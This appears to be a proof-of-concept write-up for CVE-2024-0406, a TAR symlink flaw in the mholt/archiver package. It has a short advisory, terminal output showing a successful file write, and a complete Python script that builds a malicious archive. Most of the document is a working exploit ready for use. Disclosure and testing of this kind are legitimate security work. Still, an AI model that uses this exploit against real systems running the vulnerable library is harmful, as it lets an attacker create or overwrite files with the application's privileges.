CVE-2024-0406

A flaw was discovered in the mholt/archiver package. This flaw allows an attacker to create a specially crafted TAR file, which, when unpacked, may allow access to restricted files or directories. This issue can allow the creation or overwriting of files with the user's or application's privileges using the library.

Affected versions: >=3.0.0 <= 3.5.1

---

PoC || GTFO

» python3 cve-2024-0406.py /tmp/sessions/admin/fake_session 
TAR file created at cve-2024-0406.tar with symlink pointing to /tmp/sessions/admin/fake_session

# Upload file to target which use Unarchive() function

root@5af68317d6cb:/app/unarchive/admin# ls -al
total 8
drwxr-xr-x 2 root root 4096 Jun  1 08:20 .
drwxr-xr-x 3 root root 4096 Jun  1 07:02 ..
lrwxrwxrwx 1 root root   32 Jun  1 08:20 x -> /tmp/sessions/admin/fake_session
root@5af68317d6cb:/app/unarchive/admin# cat /tmp/sessions/admin/fake_session
<some-file-content-here>

import tarfile
import sys
import io

def create_tar(tar_path, symlink_target):
    with tarfile.open(tar_path, 'w') as tar:
        # Create a symlink entry './x' pointing to symlink_target
        symlink_info = tarfile.TarInfo(name='./x')
        symlink_info.type = tarfile.SYMTYPE
        symlink_info.linkname = symlink_target
        tar.addfile(symlink_info)
        
        # Optional: Add a file with the same name 'x'
        payload_content = b'<some-file-content-here>'
        payload_info = tarfile.TarInfo(name='x')
        payload_info.size = len(payload_content)
        tar.addfile(payload_info, io.BytesIO(payload_content))
        
if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <path_to_symlink>")
        sys.exit(1)
    
    symlink_target = sys.argv[1]
    tar_path = "cve-2024-0406.tar"

    create_tar(tar_path, symlink_target)
    print(f"TAR file created at {tar_path} with symlink pointing to {symlink_target}")